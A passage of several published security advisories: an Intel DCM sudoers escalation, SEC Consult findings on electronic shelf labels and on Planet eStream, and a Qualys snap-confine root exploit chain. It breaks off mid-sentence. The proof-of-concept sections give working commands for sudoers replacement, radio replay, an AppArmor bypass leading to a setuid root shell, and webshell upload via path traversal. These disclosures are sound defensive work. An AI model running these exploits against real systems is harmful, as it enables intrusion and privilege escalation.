allowing to persist within the attached network. 6. PROOF OF CONCEPT =================== Just one way of exploitation is by replacing the current sudoers configuration: 1.Create a new sudoers configuration file using the compromised "dcm" user in i.e. /tmp/ 2.sudo chmod 440 /tmp/sudoers 3.sudo cp sudoers /etc/sudoers 4.sudo /bin/bash 7. SOLUTION =========== None. Intel thinks that this is not a vulnerability and therefore does also not assign a CVE for it. 8. REPORT TIMELINE ================== 2022-07-16: Discovery of the vulnerability 2022-07-16: Reported to vendor via their bug bounty program 2022-07-18: Vendor response: Sent to "appropriate reviewers" 2022-07-26: Vendor states that the vulnerability "depends on something that does not exist (eg; RCE)." 2022-07-26: Sent a clarification that a compromise of the "dcm" account is indeed necessary, but there have been RCEs in the past (i.e. through Log4j) 2022-09-22: Vendor has troubles to reproduce the bug and asks for another PoC 2022-09-22: Sent a clarification about the PoC 2022-09-22: Vendor states that the report "does not clearly demonstrate a vulnerability in DCM" and the report will be closed. 2022-09-23: Provided the vendor with a PoC utilizing Log4shell (CVE-2021-44228) in a former version of DCM 2022-10-10: Vendor asks whether the Log4shell bug is still reproducible in the latest version of DCM 2022-10-10: Made clear that Log4shell is not the point about the report 2022-10-11: Vendor states "We do not clearly see a a vulnerability demonstrated in DCM" 2022-10-12: [Back and forth about the provided PoCs] 2022-10-12: I'm giving up. 2022-12-07: Public disclosure 9. REFERENCES ============== https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221201-0 > ======================================================================= title: Replay attacks & Displaying arbitrary contents product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol (electronic shelf labels) vulnerable version: All fixed version: - CVE number: CVE-2022-45914 impact: critical homepage: http://www.zhsuny.com/ found: 2022-05-27 by: Steffen Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai Guangdong, is the manufacturer of electronic shelf labels and Alibaba Super Key Account Gold Supplier specializing in ESL with over 10 years’ experiences focusing on helping customers reduce cost and boost sales. Since its founding, Suny has attached great importance to exploring both international and domestic markets, thus becoming China’s top 1 manufacturer of electronic shelf labels. Its products have been widely applied in supermarkets, retail stores, pharmacies, warehouses, exhibitions, etc. We has currently provided services to customers from more than 180 countries, and total sales in 2020 have exceeded 15 million US dollars." Source: http://www.zhsuny.com/profile/ Business recommendation: ------------------------ The vendor did not respond to our communication attempts, there is no patch available. In case you are using the product, contact the vendor and urge them to fix the security vulnerabilities. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. The research has also been presented at various security conferences such as hardwear.io, named "Self-labeling electronic shelf labels". Vulnerability overview/description: ----------------------------------- 1) Replay Attack The displayed information on the price tag can be updated via a 433 MHz custom protocol (called ETAG-TECH). An attacker can record transmitted RF samples and replay them later to cause the same action. Thus, it is possible to restore an older price on the tag without the need for any information about the protocol or tag. 2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914) The ETAG-TECH protocol was reverse engineered. It was noted, that no authentication is existent. Hence, one can display arbitrary content on the electronic tag by simply transmitting messages according to the protocol. Proof of concept: ----------------- 1) Replay Attack The tag and base station communicate at 433.264 MHz. Thus, the following HackRF command can be used to record a transmission: hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20 The following command was used in order to replay the signal: hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20 A video of the attack has been published here: https://youtu.be/hj_ao25HU1E 2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914) The base station will transmit a compressed image to the tag. Thus, any content can be displayed. Following steps will have to happen: I) Send wake-up frames to the tag. II) Compress the picture that should be displayed. III) Wrap the compressed picture into the picture data structure. IV) Split the data structure into the image frames. V) Listen for the tag's response. I) The Wake-up Frame: The CRC is calculated over the whole frame, starting with the frame length field. The frame counter is counting down to zero. Every unique frame (=unique frame counter) is sent five times. The frame is transmitted at 175 kBaud. | Preamble | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 | |------------------|-------------|--------------|--------|-------------|---------------|-------------|-------| | AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0000 | 0398 | 0A | CRC | II) The Compression Algorithm: Runlength encoding is used as compression algorithm. The image is read in rows. An "a" stands for either a 1 or 0, depending on if it's a run of ones or zeros that is being encoded. A "c" stands for the length of the run. There are four different cases: Case 1: Less than 8 consecutive bits 0b1aaaaaaa Case 2: Less than 32 consecutive bits 0b0acccccc Case 3: Less than 256 consecutive bits 0b1a000000 0bcccccccc Case 4: Less than 2^16 consecutive bits 0b0a000000 0bcccccccc 0bcccccccc III) The picture data structure The compression header indicates the color channel: FC00000000 = black FC80000000 = red | LED | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data | |---------|------------|-------------|----------|--------------------|----------------|---------------|-------------------------| | 0700 | BF75 | 00ED | 000A | FC00000000 | 007F | 0127 | <Compressed Image Data> | IV) The Image Frames Image frames can only hold 54 Bytes of data. Thus the previously generated image data structure is split into chunks of 54 bytes or less. The CRC is calculated over the whole frame, starting with the frame length field. The frame counter indicates frame 1 out of 9. The frame is transmitted at 100 kBaud. | Preamble | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value | Payload | CRC16 | |------------------|-------------|--------------|--------|---------------|-------------|------------------------|-------| | AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0901 | 33 | <Image Data Structure> | CRC | V) The Tag's Response The frame is transmitted at 100 kBaud and repeated three times. | Preamble | Sync Header | Frame Length | Tag ID | Battery Voltage | RSSI | Temperature | CRC16 | |------------------|-------------|--------------|--------|-----------------|-------------|-------------|-------| | AAAAAAAAAAAAAAAA | D391D391 | 07 | 065302 | 1D = 2.9V | 2068 | E9 = 23.3C | CRC | Following these steps, custom images can be sent over the ETAG-TECH protocol. The only required information is the tag ID which is printed on the tag. Otherwise it can be sniffed by listening to the RF interface and waiting for base station communication. Thus, the tag can be fully controlled by an attacker. Videos of the attack have been published here: * Displaying arbitrary tag contents: https://youtu.be/028Gn4VC8yE * Receiving arbitrary ESL-TECH messages: https://youtu.be/x7t0QViu2gU Vulnerable / tested versions: ----------------------------- No version information could be identified for this product. Vendor contact timeline: ------------------------ 2022-08-14: Contacting vendor through info@zhsuny.com.cn and zhsuny@yeah.net No response. 2022-08-27: Contacting vendor through st@zhsuny.com.cn, no response. 2022-09-12: Contacting vendor again, communicating public release for October No response. 2022-12-01: Public release of security advisory. Solution: --------- The vendor did not respond to our communication attempts, there is no patch available. In case you are using the product, contact the vendor and urge them to fix the security vulnerabilities. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz / @2022 </code></pre>

<pre><code> Qualys Security Advisory Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) ======================================================================== Contents ======================================================================== Summary Background Exploitation Acknowledgments Timeline I can't help but feel a missed opportunity to integrate lyrics from one of the best songs ever: [SNAP! - The Power (Official Video)] -- https://twitter.com/spendergrsec/status/1494420041076461570 ======================================================================== Summary ======================================================================== We discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory, we tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how we exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973): https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt ======================================================================== Background ======================================================================== Like the crack of the whip, I Snap! attack Radical mind, day and night all the time -- SNAP! - The Power In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory (https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt): to set up a snap's sandbox, snap-confine created the temporary directory /tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did not belong to root; a local attacker could race against snap-confine, retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full root privileges. This vulnerability was patched by commit acb2b4c ("cmd/snap-confine: Prevent user-controlled race in setup_private_mount"), which introduced a new helper function, must_mkdir_and_open_with_perms(): ------------------------------------------------------------------------ 142 static void setup_private_mount(const char *snap_name) ... 169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name); ... 176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700); ------------------------------------------------------------------------ 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, 56 mode_t mode) .. 61 mkdir: .. 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) { .. 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); .. 81 if (fstat(fd, &st) < 0) { .. 84 if (st.st_uid != uid || st.st_gid != gid 85 || st.st_mode != (S_IFDIR | mode)) { ... 130 if (rename(dir, random_dir) < 0) { ... 135 goto mkdir; ------------------------------------------------------------------------ - the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if it does not exist already; - if it already exists, and if it does not belong to root (at line 84), then it is moved out of the way (at line 130) by rename()ing it to a random directory in /tmp, and its creation is retried (at line 135). When we reviewed this patch back in December 2021, we felt very nervous about this rename() call (because it allows a local attacker to rename() a directory they do not own), and we advised the Ubuntu Security Team to either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create it in a non-world-writable directory instead of /tmp, or at least to use renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of these ideas were deemed impractical (for example, renameat2() is not supported by older kernel and glibc versions); moreover, we (Qualys) failed to come up with a feasible attack plan against this rename() call, so the patch was kept in its current form. After the release of Ubuntu 22.04 in April 2022, we decided to revisit snap-confine and its recent hardening changes, and we finally found a way to exploit the rename() call in must_mkdir_and_open_with_perms(). ======================================================================== Exploitation ======================================================================== It's getting, it's getting, it's getting kinda heavy It's getting, it's getting, it's getting kinda hectic -- SNAP! - The Power The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are: 1/ snap-confine operates in /tmp to create a snap's temporary directory (/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in /tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in sc_bootstrap_mount_namespace(), where all of the Xs are randomized by mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap instance name by sc_instance_name_validate() (when all of the Xs are lowercase alphanumeric): ------------------------------------------------------------------------ 286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config) ... 288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX"; ... 291 if (mkdtemp(scratch_dir) == NULL) { ... 303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL); ... 319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND, ... 331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL; ... 342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir, 343 mnt->path); ... 352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND, ------------------------------------------------------------------------ 2/ We therefore execute two instances of snap-confine in parallel: - we block the first snap-confine immediately after it creates its root directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this race condition by "single-stepping" snap-confine, as explained in our "Lemmings" advisory); - we execute the second snap-confine with a snap instance name of rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine; - we kill this second snap-confine immediately after it rename()s its temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we reliably win this race condition with inotify, as explained in our "Lemmings" advisory); - we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and resume the execution of the first snap-confine, whose root directory now belongs to us. 3/ We can therefore create an arbitrary symlink /tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will bind-mount the real /tmp directory (which is world-writable) onto any directory in the filesystem (because mount() will follow our arbitrary symlink at line 352). This ability will eventually allow us to obtain full root privileges, but we must first solve three problems: ------------------------------------------------------------------------ Problem a/ We cannot trick snap-confine into rename()ing /tmp/snap.rootfs_XXXXXX, because this directory belongs to root and must_mkdir_and_open_with_perms() rename()s it only if it does not belong to root! This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX belongs to the user root, but it belongs to the group of our own user, so must_mkdir_and_open_with_perms() rename()s it because it does not belong to the group root (at line 84). ------------------------------------------------------------------------ Problem b/ We cannot trick snap-confine into following our symlink /tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace() bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line 319): if we create our symlink before this bind-mount, then it becomes covered by the squashfs; and we cannot create our symlink after this bind-mount, because the squashfs is read-only and belongs to root! The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount" of our "Lemmings" advisory suggests a solution to this problem: we must unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace() bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022, but we found a surprisingly simple workaround: we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately after we re-create this directory ourselves; this allows us to unmount (with fusermount -u -z) any subsequent bind-mounts (even if they belong to root), because fusermount does not check that our FUSE filesystem is indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX. ------------------------------------------------------------------------ Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp onto an arbitrary directory in the filesystem (at line 352), because such a bind-mount is forbidden by snap-confine's AppArmor profile! To solve this problem, we must bypass AppArmor completely, but the technique we used in our "Lemmings" advisory (we wrapped snap-confine's execution in an AppArmor profile that was in "complain" mode, not in "enforce" mode) was patched in February 2022 (by commits 26eed65 and 4a2eb78, "ensure that snap-confine is in strict confinement" and "Tighten AppArmor label check"): now, snap-confine's execution must be wrapped in an AppArmor profile that is in "enforce" mode and whose label matches the regular expression "^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$". We were about to give up on trying to exploit snap-confine, when we discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is installed by default on Ubuntu Server): these two vulnerabilities allow us to create a directory named "failed_wwids" (user root, group root, mode 0700) anywhere in the filesystem, and we were able to transform this very limited directory creation into a complete AppArmor bypass. AppArmor supports policy namespaces that are loosely related to kernel user namespaces; by default, no AppArmor namespaces exist: ------------------------------------------------------------------------ $ ls -la /sys/kernel/security/apparmor/policy/namespaces total 0 drwxr-xr-x 2 root root 0 Aug 6 12:42 . drwxr-xr-x 5 root root 0 Aug 6 12:42 .. ------------------------------------------------------------------------ However, we (attackers) can create an AppArmor namespace "failed_wwids" by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd: ------------------------------------------------------------------------ $ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath $ multipathd list devices | grep 'whitelisted, unmonitored' sda1 devnode whitelisted, unmonitored ... $ multipathd list list path sda1 fail $ ls -la /sys/kernel/security/apparmor/policy/namespaces total 0 drwxr-xr-x 3 root root 0 Aug 6 12:42 . drwxr-xr-x 5 root root 0 Aug 6 12:42 .. drwx------ 5 root root 0 Aug 6 13:38 failed_wwids ------------------------------------------------------------------------ Then, we can enter this AppArmor namespace by creating and entering an unprivileged user namespace: ------------------------------------------------------------------------ $ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh ------------------------------------------------------------------------ Inside this namespace, we can create an AppArmor profile labeled "/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all possible operations: ------------------------------------------------------------------------ # apparmor_parser -K -a << "EOF" /usr/lib/snapd/snap-confine (enforce) { capability, network, mount, remount, umount, pivot_root, ptrace, signal, dbus, unix, file, change_profile, } EOF ------------------------------------------------------------------------ Back in the initial namespace, we check that our "allow all" AppArmor profile still exists: ------------------------------------------------------------------------ # aa-status apparmor module is loaded. 32 profiles are loaded. 32 profiles are in enforce mode. ... :failed_wwids:/usr/lib/snapd/snap-confine ------------------------------------------------------------------------ Last, we make sure that snap-confine accepts our "allow all" AppArmor profile (i.e., AppArmor is bypassed, and snap-confine is effectively unconfined): ------------------------------------------------------------------------ $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent ... DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine DEBUG: apparmor mode is: enforce ------------------------------------------------------------------------ We can therefore bind-mount /tmp onto an arbitrary directory in the filesystem (by exploiting CVE-2022-3328); since we already depend on multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath, create our own shared library /lib/multipath/libchecktur.so, shutdown multipathd (by exploiting CVE-2022-41974), restart multipathd (through its Unix socket), and finally obtain full root privileges (because multipathd executes our shared library as root when it restarts): ------------------------------------------------------------------------ $ grep multipath /proc/self/mountinfo | wc 0 0 0 $ gcc -o CVE-2022-3328 CVE-2022-3328.c $ ./CVE-2022-3328 scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c $ grep multipath /proc/self/mountinfo 1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw ... $ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c $ ps -ef | grep 'multipath[d]' root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s $ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit ok $ ps -ef | grep 'multipath[d]' | wc 0 0 0 $ ls -l /tmp/sh ls: cannot access '/tmp/sh': No such file or directory $ multipathd list daemon error -104 receiving packet $ ls -l /tmp/sh -rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh $ /tmp/sh -p # id uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup) ^^^^^^^^^^^^ ------------------------------------------------------------------------ ======================================================================== Acknowledgments ======================================================================== We thank the Ubuntu security team (Alex Murray and Seth Arnold in particular) and the snapd team for their hard work on this snap-confine vulnerability. We also thank the members of linux-distros@openwall. ======================================================================== Timeline ======================================================================== 2022-08-23: Contacted security@ubuntu. 2022-11-28: Contacted linux-distros@openwall. 2022-11-30: Coordinated Release Date (17:00 UTC). </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221130-0 > ======================================================================= title: Multiple critical vulnerabilities product: Planet Enterprises Ltd - Planet eStream vulnerable version: <6.72.10.07 fixed version: 6.72.10.07 CVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891, CVE-2022-45889, CVE-2022-45892, CVE-2022-45890, CVE-2022-45894, CVE-2022-45895 impact: critical homepage: https://www.planetestream.co.uk found: 2022-09-01 by: Timon Vogel (Office Vienna) Philipp Espernberger (Office Linz) Hrvoje Filakovic (Office Osijek) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Planet eStream is a powerfully simple and secure video platform, making media more accessible and engaging for students and educators across secondary, further, and higher education" Source: https://www.planetestream.co.uk Business recommendation: ------------------------ The vendor provides an update for the affected version which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the Planet eStream video streaming platform conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896) The application allows users to upload files at multiple places. It was identified that it is possible to upload arbitrary malicious files without any restriction and also without prior authentication! An attacker can upload a webshell and takeover the system. 2) Account Takeover (CVE-2022-45893) A problem identified in the cookie and session management of the web application allows users with low privileges to bypass the authentication and authorization mechanisms. They can be bypassed by changing the value of the ON cookie. In this way, users with low privileges can gain access to application features that are only accessible to administrative and privileged users. 3) Broken Access Control (CVE-2022-45891) Due to flaws in the authorization scheme, an authorization bypass vulnerability allows an attacker to get access to restricted functions of the web application. This can be leveraged to upload files to the web server without authentication and gain access to restricted content that was uploaded by other users. 4) SQL Injection (CVE-2022-45889) Due to insufficient input validation, the application allows the injection of direct SQL commands. By exploiting the vulnerability, an attacker gains access to all records stored in the database and can execute arbitrary SQL commands. 5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892) User input is not properly sanitized or encoded in various places. This leads to several stored cross-site scripting (XSS) vulnerabilities. By exploiting this vulnerability, an attacker can persistently embed arbitrary HTML or JavaScript code into the affected web page. The code is executed in the context of the victim's browser when visiting the manipulated site. Additionally, users are potential victims of browser exploits and JavaScript trojans. 6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890) One of the application scripts returns unfiltered or unescaped user input. This leads to a reflected cross-site scripting (XSS) vulnerability. With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code into the victim's web browser. Once the victim clicks a malicious link, the attacker's code is executed in the context of the victim's web browser. The vulnerability can be used to change the contents of the displayed site or redirect to other malicious sites. Additionally, users are potential victims of browser exploits and JavaScript trojans. 7) Path Traversal (CVE-2022-45894) Attackers can gain access to files and directories outside the web root through the use of relative file paths. In this case an authenticated attacker with any role can inject "..\" sequences into a certain URL parameter in order to navigate through the file system and access local files. 8) Information Disclosure (CVE-2022-45895) Parts of the application were discovered that disclose sensitive data to application users. While securely disclosing necessary information to authorized users will normally not present a security threat, the identified components disclose sensitive data that belongs to other users. Proof of concept: ----------------- 1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896) Various file upload vulnerabilities were identified in the web application. The following sections describe the vulnerabilities in detail. The file upload is restricted to certain file types in some cases. This restriction is only enforced in the frontend and can be bypassed by intercepting the request and modifying it. There is no further validation of uploaded files in the backend. Therefore, it is sufficient to change the filename ending in the intercepted request. a) File Upload with Path Traversal An authenticated attacker with the permission to attach documents to already existing content (e.g. videos) can upload any file. In some cases, the role Member is sufficient. Under "Categories -> choose a video -> related Media" a new malicious file can be uploaded. The following POST request is sent to the server when a normal PNG file is uploaded: =============================================================================== POST /Upload2.ashx?f=seclogo.png&c=0&l=53134&t=1662103112126&p=\Temp&ut=0&tc=0&bs=53134&ct=1662103112126 HTTP/2 Host: $host Cookie: [...] ‰PNG [...] =============================================================================== Based on the previous POST request to upload files, the request can be manipulated to upload any content to any directory by using path traversal techniques. The following code shows the modified request. The content is changed from a PNG image to an ASP web shell. The filename ending is changed to asp and the path is inserted into the p parameter, which is vulnerable to path traversal. =============================================================================== POST /Upload2.ashx?f=webshell.asp&c=0&l=1024&t=1661943922096&p=..\$path\&ut=0&tc=0&bs=1024&ct=1661943922097 HTTP/2 Host: $host Cookie: [...] $ASPWEBSHELL =============================================================================== As the following response shows, the file is being processed by the web server: =============================================================================== HTTP/2 200 OK Content-Type: text/plain; charset=utf-8 Date: Fri, 02 Sep 2022 07:16:11 GMT Content-Length: 12 progress:100 =============================================================================== The web shell can now be accessed via the following URL: =============================================================================== https://$host/$path/webshell.asp =============================================================================== An attacker now has the possibility to execute any command in context of the web server. Therefore, the web server is completely compromised. As described in chapter 3) Broken Access Control, section a) an unauthenticated file upload is possible if the attacker knows the correct request. b) General Upload An authenticated attacker with the permission to upload documents (role editor, publisher or admin) can upload any file. Under "Create -> Upload -> Upload Document" a new malicious file can be uploaded. i) ASP Web Shell After choosing the malicious file for the file upload the following POST request is sent to the web server: =============================================================================== POST /Upload2.ashx?f=cmdasp.asp&c=0&l=1024&t=1661939611305&p=PreConversionMedia\&ut=0&tc=0&bs=1024&ct=1661939611305 HTTP/2 Host: $host Cookie: [...] Content-Length: 1024 $ASPWEBSHELL =============================================================================== As the following response shows, the file is being processed by the web server: =============================================================================== HTTP/2 200 OK Content-Type: text/plain; charset=utf-8 Date: Wed, 31 Aug 2022 09:53:31 GMT Content-Length: 12 progress:100 =============================================================================== To finish the upload of the malicious file, an attacker simply needs to click the "Start Upload" button that becomes visible in the web interface. After starting the upload, the following POST request is sent to the web server. =============================================================================== POST /Ajax.asmx/ProcessUpload2 HTTP/2 Host: $host Cookie: [...] Content-Type: application/json; charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 538 {"fn":"webshell.asp","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsource" :0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"FieldValu e\":\"webshell\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"Type\":\ "ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\ ":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue\":\ "\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""} =============================================================================== The response of the web server discloses the new generated filename 8273~4u~vE7bUON0 as shown below. =============================================================================== HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Date: Wed, 31 Aug 2022 09:53:31 GMT Content-Length: 541 {"d":"{\"Success\":true,\"ClipDataID\":8273,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8273~4u~vE7bUON0\", [...] } =============================================================================== After the filename is known the web shell can now be accessed via following URL: =============================================================================== https://$host/content/8273_4u~vE7bUON0.asp =============================================================================== An attacker now has the possibility to execute any command in context of the web server. Therefore, the web server is completely compromised. ii) Malicious HTML File After choosing the malicious file, the following POST request is sent to the web server: =============================================================================== POST /Upload2.ashx?f=secconsult.html&c=0&l=102&t=1661947994372&p=PreConversionMedia\&ut=0&tc=0 &bs=102&ct=1661947994373 HTTP/2 Host: $host Cookie: [...] Content-Length: 1024 <!DOCTYPE html> <html> <body> <h1>SEC Consult Webpage</h1> hosted by $host </body> </html> =============================================================================== As the following response shows, the file is being processed by the web server: =============================================================================== HTTP/2 200 OK Content-Type: text/plain; charset=utf-8 Date: Wed, 31 Aug 2022 12:13:13 GMT Content-Length: 12 progress:100 =============================================================================== To finish the upload of the malicious file, an attacker simply needs to click the "Start Upload" button which pops up in the web interface. After starting the upload, the following POST request is sent to the web server: =============================================================================== POST /Ajax.asmx/ProcessUpload2 HTTP/2 Host: $host Cookie: [...] Content-Type: application/json; charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 539 {"fn":"secconsult.html","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsou rce":0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"Field Value\":\"secconsult\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"T ype\":\"ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"F ieldID\":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue \":\"\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""} =============================================================================== The response of the web server discloses the new generated filename 8278~4z~b2w2tWQF as shown below. =============================================================================== HTTP/2 200 OK Content-Type: application/json; charset=utf-8 Date: Wed, 31 Aug 2022 12:13:14 GMT Content-Length: 545 {"d":"{\"Success\":true,\"ClipDataID\":8278,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8278~4z~b2w2tWQF\", [...] } =============================================================================== The HTML webpage can now be accessed via following URL: =============================================================================== https://$host/content/8278_4z~b2w2tWQF.html =============================================================================== An attacker now has the possibility to infect the user's browser with JavaScript to execute any command in the context of the web server or can host webpages for phishing attacks on the server of the Planet eStream instance. 2) Account Takeover (CVE-2022-45893) An authenticated attacker with the role Member or Bypass can elevate their privileges by changing the ON cookie value. An attacker can easily brute force the value of the cookie due to the low entropy of the cookie or search for leaked cookie values in the web application as described in chapter 8) Information Disclosure, section a). Based on the format of the cookie the following pattern was used to generate possibly valid cookies. =============================================================================== [0-1][AZ]~[azAZ][azAZ] =============================================================================== To verify the vulnerability an authenticated session is required. Sessions that are created by opening a sharing link to bypass authentication are sufficient. Therefore, an attacker doesn’t necessarily need a valid user account with valid 